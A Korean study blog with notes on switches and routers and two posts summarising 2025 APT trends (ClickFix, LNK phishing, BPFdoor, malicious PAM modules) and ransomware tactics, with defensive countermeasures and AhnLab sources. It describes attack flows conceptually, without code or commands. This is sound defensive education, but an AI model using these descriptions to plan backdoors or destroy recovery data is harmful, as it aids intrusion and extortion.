물리 계층 : 비트 단위의 데이터를 전기적, 기계적 신호로 변환하여 전송하는 계층
네트워크 장비
- 스위치
  - L2 계층에서 동일 네트워크 간에 MAC주소를 기반으로 프레임을 전송
  - 기능
    - 학습 : 스위치의 포트로 들어오는 프레임의 출발지 MAC주소 학습
    - 플러딩 : 데이터의 목적지를 알지 못할 경우 수신 포트를 제외한 모든 포트로 프레임 전송
    - 포워딩 : 목적지 MAC 주소가 이미 테이블에 등록되어 있는 경우 해당 주소와 매핑된 하나 포트로만 데이터 전송
    - 필터링 : 프레임 전송을 기준에 따라 허용 및 차단
    - 에이징 : 일정 시간 동안 장비로부터 데이터가 들어오지 않을 경우 테이블에서 삭제
- 라우터
  - L3계층에서 동작하는 장비로 서로 다른 네트워크 간에 IP주소를 기반으로 최적의 경로를 설정해 패킷을 전송
  - 기능
    - 경로 설정 : 데이터 패킷이 목적지까지 가는 최적의 경로를 설정
    - 라우팅 테이블 관리 : 목적지 네트워크 IP주소, 서브넷 마스크, 게이트웨이, 네트워크 인터페이스, 메트릭
    - 필터링 : 관리자가 설정한 규칙에 따라 필터링 (일부 방화벽 역할 수행)
    - 주소 변환 : NAT

2025년 APT 및 최신 사이버 위협 동향 정리

천천히, 한 걸음씩 — Sun, 28 Sep 2025 12:02:25 +0900

1. 주요 사이버 위협 동향

2024년 하반기 사이버 공격 통계
- 서버 해킹: 56% (웹·DB·인프라 공격 집중)
- 악성코드 감염: 12% (그중 85%가 랜섬웨어)
2025년 상반기 주요 트렌드
- Spear Phishing 고도화 (.txt, .lnk 등 ‘안전’ 인식 확장자 활용)
- 가짜 소프트웨어 다운로드 페이지 & 광고 노출 통한 유포
- 해외에서 발견된 위협이 빠르게 국내로 유입

2. APT 공격·사회공학 기법

공격 단계: 정보 수집 → 접근 확보 → 권한 상승 → 지속성 확보
주요 특징
- 사회공학: 사용자의 심리를 이용한 초기 접근 (클릭 유도, 보안 경고 위장)
- ClickFix 기법
  - 피해자가 보안 경고·알림창을 클릭해 PowerShell 등 명령을 직접 실행하도록 유도
  - OS 취약점 없이도 공격 가능
  - 다국어 PDF, 난독화, 스케줄러 등록 등으로 탐지 회피 및 지속성 확보
  - 악성코드 및 도구
    - BabyShark : Kimsuky의 대표 스크립트 기반 악성코드 시리즈
    - .vbs 악성 스크립트 : C2연결, 정보 수집 및 스케줄러 등록 기능 포함
    - .lnk 파일(Edge 아이콘 위장) : 사용자 클릭 유도용 단축 실행 파일, 즉 사회 공학 기법
    - AutoIt 스크립트 (HncUpdateTray.exe) : 사용자 정보 탈취 목적 실행 파일
    - QuasarRAT : ClickFix 캠페인에서 최종적으로 사용된 원격 제어·정보 탈취 악성코드.
      .vbs, .lnk, AutoIt 스크립트는 QuasarRAT을 설치·실행하거나, 정보 탈취·사용자 유도 등 보조 기능을 수행하는 단계별 도구로 활용됨.
결론: 북한의 APT 그룹 Kimsuky는 ClickFix 기법을 이용해 사용자가 Powershell 명령을 직접 입력하도록 유도하는 전술을 수행했다.

3 .LNK 활용 공격 (Spear Phishing)

공격 흐름
1. 사용자가 LNK 클릭
2. PowerShell 명령 실행 → CAB 압축 해제
3. 악성 스크립트 자동 실행 → 정보 탈취·추가 악성코드 설치
디코이 파일: 정상 문서처럼 위장, 공격 성공 후 열려도 영향 없음
보안적 시사
- 확장자 확인 (.doc.lnk 형태 주의)
- PowerShell 실행 정책 제한
- 개인 PC는 .ps1, .vbs 실행 전 반드시 확인

4. BPFdoor 공격

공격 과정
1. BPF 필터 등록
  - 커널에 특정 조건(IP, 매직 패턴)만 허용하는 필터 심기
  - 조건에 맞는 패킷만 백도어로 전달
  - 조건에 맞는 패킷만 백도어로 전달하고, 나머지는 무시하여 시스템과 보안 솔루션에는 포트가 닫혀 있는 것처럼 인식
  - 핵심: 커널 영역에서 처리되므로 포트 열림 여부와 관계없이 은폐 가능
2. 매직 넘버 포함 패킷 수신 시 공격자 인식
  - 필터 조건을 만족하는 패킷 도착 시 백도어 활성화
3. 리버스 커넥션으로 C2 연결
  - 포트 개방 여부와 상관없이 공격자와 연결하여 원격 명령 수행 가능
4. 원격 명령 실행 (포트 개방 여부 무관)
  - 데이터 수집, 시스템 제어, 추가 악성코드 설치
  - 흔적 최소화, 은폐 지속
특징
- 커널 수준에서 패킷 필터링 → 탐지 어려움
- 은폐 + 선택적 응답 + 자동화가 핵심 전략
- 포트 스캔이나 일반 트래픽 분석만으로는 백도어 존재를 알기 어려움

5. PAM 악성 모듈·Preload 공격

PAM 개요
- 리눅스·유닉스 인증 프레임워크
- su, sudo, sshd 등 서비스별 인증 로직을 모듈화하여 처리
- 서비스 프로그램은 PAM 모듈에게 “이 사용자가 인증 가능한가?”라는 요청만 전달
- 모듈 내부에서 실제 인증 정보 확인 → 서비스는 파일 접근 불필요
공격 유형
- 모듈 교체: 정상 PAM 모듈을 악성코드로 대체, 설정 수정
- Preload 후킹: 파일 변경 없이 라이브러리 강제 로드 → 인증 정보 탈취
대응
- 모듈 무결성확인 : /lib/security/ 모듈 해시값 정기 점검
- 설정 변경 감시 : /etc/pam.d/ 설정 변경 모니터링
- 계정 활동 감사 : root 계정 사용 이력 감사
- EDR 이벤트 활용 : EDR에서 PAM 모듈 등록 이벤트 알림 활용

6. 현대 공격 트렌드

시대	대표 공격 방식	특징
2000년대 초	DDOS, 웹 사이트 deface(낙서)	단순 과시, 서비스 불능 유도
2010년대	랜섬웨어, 정보 탈취형 APT	금전적 동기 본격화
2020년대	공급망 공격, 내부망 장기 침투	은밀히 침투 → 정보/금전/지적재산 빼가기

전략 변화 이유
1. 탐지 회피 : 정상 트래픽·정상 프로세스 위장
2. 장기 침투 : 수개월~1년 이상 내부 잠복
3. 경제적 효율 : 데이터 탈취·지적재산 유출이 더 큰 가치

7. 참고 자료

ASEC(AhnLab Security Intelligence Center) - APT 공격 동향 보고서
ASEC - 클릭픽스와 bpfdoor까지, 25년 사이버 위협 동향

현대 랜섬웨어 동향과 보안 시사점

천천히, 한 걸음씩 — Sun, 21 Sep 2025 09:29:04 +0900

1. 랜섬웨어 개요

정의: 랜섬웨어는 피해자로부터 금전을 요구하기 위해 데이터를 암호화하거나 시스템 접근을 차단하는 악성 프로그램.
공격 과정:
1. 사전 침투 → 2. 정보 수집 → 3. 대상 지정 → 4. 맞춤형 배포
공통 특징:
- 섀도 복사본 삭제(vssadmin)
- RDP/DB 관련 서비스 중지
- 일부 예외 폴더/확장자 제외, 최근 파일 우선 암호화
- DLS(Dedicated Leak Site)를 통한 피해 데이터 공개 협박 가능
목표: 피해자로부터 금전을 요구하고, 복호화 가능성을 공격자가 통제

2. 언더그라운드 랜섬웨어

암호화 방식: AES 대칭키로 파일 암호화 → AES 키를 RSA 공개키로 암호화 (하이브리드 암호화)
- AES 키는 파일 끝(Tail)에 삽입, 메타데이터 포함
- 파일마다 키가 달라 같은 평문도 암호문이 다름
특징:
- 피해 복구 방해 및 분석 회피 기능 내장
- 맞춤형 배포, 최근 파일 우선 암호화, 일부 예외 폴더/확장자 제외
- DLS 운영으로 2차 협박 가능

3. DireWolf 랜섬웨어

목표: 특정 파일 빠르게 암호화 후 자기 삭제
공격 과정: Mutex 체크 → 워커풀 생성 → 병렬 처리 → 파일 암호화 → 후처리(마커 파일, 재부팅, 프로세스 종료)
암호화 방식: 난수 개인키 + 하드코딩된 공개키, CURVE 키 교환 → AES 대칭키로 파일 암호화
특징:
- 스트라이프 방식 적용, 파일 크기별 전략적 암호화
- 분석 및 복구 방해 기능 내장, 자기 삭제 루틴 포함

4. 랜섬웨어 진화 및 유형

초기형: CryptoLocker – 개별 PC 파일 암호화, 단순 금전 요구
네트워크 전파형: WannaCry – 자동 감염, 산업 규모 피해
유형별 특징:
- Crypto Ransomware: 파일/DB 암호화
- Locker Ransomware: 화면 잠금, 심리적 압박
- Hybrid Ransomware: 파일 암호화 + 부팅 차단
- Double Extortion: 데이터 암호화 + 외부 유출 협박
- RaaS(Ransomware-as-a-Service): 툴 임대/판매, 범죄 산업화

5. 고급 공격 전략

복원 지점 제거
예약 백업/메타데이터 삭제
WinRE 비활성화, 부팅 복구 차단
주요 이벤트 로그 삭제
백업/DB 운영/윈도우 업데이트/가상화 서비스 종료 → 모니터링·보안 무력화

6. 대응 전략 (KISA 기준)

외부 접속 관리 강화
계정 관리 철저
공용 NAS (Network Attached Storage) 보안 강화
체계적 백업 및 복구 훈련

7. 결론

“데이터를 지키는 것이 곧 생존을 지키는 것”
랜섬웨어는 단순 파일 암호화를 넘어 기업 시스템 전체와 민감 정보까지 위협한다.
사전 예방, 백업, 계정·접속 관리, 보안 모니터링, 복구 훈련이 유일한 생존 전략이다.

참고 자료

안랩 시큐리티 레터 제 1078-1079호